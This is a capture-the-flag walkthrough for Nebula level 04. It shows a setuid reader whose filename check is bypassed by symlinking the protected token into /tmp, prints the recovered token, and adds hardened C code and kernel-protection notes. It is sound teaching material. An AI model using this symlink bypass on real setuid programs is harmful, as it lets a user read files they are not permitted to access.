Exploit Exercises: Nebula Level 04
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.
Source code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>        /* err(); the original listing omits this header */

int main(int argc, char **argv, char **envp)
{
    char buf[1024];
    int fd, rc;

    if(argc == 1) {
        printf("%s [file to read]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* The only guard: a substring match on the argument string itself.
     * It never inspects the file that string actually resolves to. */
    if(strstr(argv[1], "token") != NULL) {
        printf("You may not access '%s'\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    /* Opened with the setuid owner's (flag04's) privileges; symlinks are followed. */
    fd = open(argv[1], O_RDONLY);
    if(fd == -1) {
        err(EXIT_FAILURE, "Unable to open %s", argv[1]);
    }

    rc = read(fd, buf, sizeof(buf));
    if(rc == -1) {
        err(EXIT_FAILURE, "Unable to read fd %d", fd);
    }

    write(1, buf, rc);
}
Solution
After logging in, we go to the flag04 home directory.
level04@nebula:~$ cd /home/flag04/
level04@nebula:/home/flag04$ ls -al
total 13
drwxr-x--- 2 flag04 level04 93 Nov 20 2011 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
-rw-r--r-- 1 flag04 flag04 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag04 flag04 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag04 flag04 675 May 18 2011 .profile
-rwsr-x--- 1 flag04 level04 7428 Nov 20 2011 flag04
-rw------- 1 flag04 flag04 37 Nov 20 2011 token
level04@nebula:/home/flag04$
Hmm, let’s get more info by trying some basic commands.
level04@nebula:/home/flag04$ file flag04
flag04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ cat token
cat: token: Permission denied
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'
level04@nebula:/home/flag04$
Permission denied. Really? Nope. Look at the check again: strstr(argv[1], "token") only inspects the string we pass on the command line, it never looks at the file that string resolves to, and the open() that follows runs with flag04's privileges because of the setuid bit. So all we need is a path that names the token file without containing the word "token". /tmp is writable by every user, so we create a symbolic link there under a name of our choosing. (A hard link would pass the same string check, but hard-linking a file you do not own is refused on kernels with fs.protected_hardlinks=1, so the symlink is the portable choice.)
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -la /tmp
total 0
drwxrwxrwt 4 root root 100 Oct 16 13:18 .
drwxr-xr-x 1 root root 220 Oct 16 2017 ..
drwxrwxrwt 2 root root 40 Oct 16 2017 .ICE-unix
drwxrwxrwt 2 root root 40 Oct 16 2017 .X11-unix
lrwxrwxrwx 1 level04 level04 18 Oct 16 13:17 level04 -> /home/flag04/token
level04@nebula:/home/flag04$
That funny moment when you see "lrwxrwxrwx" as the permissions of your link: the leading l marks a symbolic link, and the mode bits on a symlink are ignored anyway. What matters is that flag04, running with its setuid owner's privileges, follows the link to the real token. One caveat for modern systems: kernels with fs.protected_symlinks=1 (the default on current distributions) refuse to follow a symlink in a sticky, world-writable directory such as /tmp unless the process's uid matches the link owner or the directory owner, so there the link would have to live in a directory level04 owns; the Nebula image predates that protection. Let's end this.
level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$
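To make the failure mode concrete, here is an added example (not part of the original walkthrough or of the Nebula sources): the level's strstr check side by side with a hardened check that compares the opened descriptor to the protected file by device and inode. The temp directory, the file contents and the names token, level04 and readme are constructed for the demo, mirroring the ln -s step above; outcome_for() and the bitmask constants are the example's own names, not anything from the level.

```c
#define _POSIX_C_SOURCE 200809L   /* mkdtemp, symlink */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define NAME_DENIED   1   /* the strstr check refused the argument        */
#define FD_DENIED     2   /* the descriptor check refused the opened file */
#define READ_OK       4   /* the file was read                            */

/* flag04's check: a substring test on the string the caller typed. It never
 * looks at the file that string resolves to, so a symlink (or a hard link,
 * or a ../ path) whose name avoids "token" walks straight past it. */
static int denied_by_name(const char *arg)
{
    return strstr(arg, "token") != NULL;
}

/* Hardened check: open first, then ask the kernel which file we actually got
 * and compare it with the protected file by (device, inode). Deciding on the
 * open descriptor rather than on the path also closes the check-then-use
 * window in which a caller could swap the path underneath us.
 * Returns 1 if fd is the protected file, 0 if not, -1 on error. */
static int fd_is_protected_file(int fd, const char *protected_path)
{
    struct stat opened, guarded;
    if (fstat(fd, &opened) == -1 || stat(protected_path, &guarded) == -1)
        return -1;
    return opened.st_dev == guarded.st_dev && opened.st_ino == guarded.st_ino;
}

/* Constructed fixture (not taken from the Nebula image): a private temp
 * directory holding "token", a harmless "readme", and a symlink "level04"
 * pointing at token. Built once; the directory is left behind in /tmp. */
static char fixture_dir[64];

static int build_fixture(void)
{
    if (fixture_dir[0] != '\0')
        return 0;                                  /* already built */
    char tmpl[] = "/tmp/nebula04-XXXXXX";
    if (mkdtemp(tmpl) == NULL)
        return -1;
    strcpy(fixture_dir, tmpl);

    char path[96];
    const char *files[2][2] = { { "token",  "constructed-token-value\n" },
                                { "readme", "nothing secret here\n" } };
    for (int i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", fixture_dir, files[i][0]);
        FILE *f = fopen(path, "w");
        if (f == NULL)
            return -1;
        fputs(files[i][1], f);
        fclose(f);
    }
    char target[96];
    snprintf(target, sizeof target, "%s/token", fixture_dir);
    snprintf(path, sizeof path, "%s/level04", fixture_dir);
    return symlink(target, path);
}

/* Run one name inside the fixture through both checks (independently, so we
 * can see which check catches what) and return a bitmask of NAME_DENIED /
 * FD_DENIED / READ_OK, or -1 on error. */
int outcome_for(const char *name)
{
    if (build_fixture() == -1)
        return -1;
    char arg[128], token[96], buf[256];
    snprintf(arg, sizeof arg, "%s/%s", fixture_dir, name);
    snprintf(token, sizeof token, "%s/token", fixture_dir);

    int result = 0;
    if (denied_by_name(arg))
        result |= NAME_DENIED;

    int fd = open(arg, O_RDONLY);
    if (fd == -1)
        return -1;
    int hit = fd_is_protected_file(fd, token);
    if (hit != 0)                  /* protected, or undecidable: fail closed */
        result |= FD_DENIED;
    else if (read(fd, buf, sizeof buf) > 0)
        result |= READ_OK;
    close(fd);
    return result;
}

int main(void)
{
    const char *names[] = { "token", "level04", "readme" };
    for (int i = 0; i < 3; i++) {
        int r = outcome_for(names[i]);
        printf("%-8s name check: %-7s fd check: %-7s read: %s\n", names[i],
               r & NAME_DENIED ? "denied" : "passed",
               r & FD_DENIED   ? "denied" : "passed",
               r & READ_OK     ? "yes"    : "no");
    }
    return 0;
}
```

Compile with cc and run: the level04 symlink passes the name check and is caught by the descriptor check, the token path is refused by both, and readme is read normally. Because the decision is taken on the file the kernel actually opened, symlinks, hard links, ../ paths and rename races all resolve the same way. For a real setuid reader the better fix is still not a denylist at all but opening the file with privileges dropped to the real uid, so the kernel's own permission check does the work.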
Now keep in mind that in these Nebula levels the token is the password of the corresponding flag account, so we can su to flag04 with it and run getflag.
level04@nebula:/home/flag04$ su flag04
Password:
sh-4.2$ id
uid=995(flag04) gid=995(flag04) groups=995(flag04)
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
See you in the next tutorial. Share, Like and ask!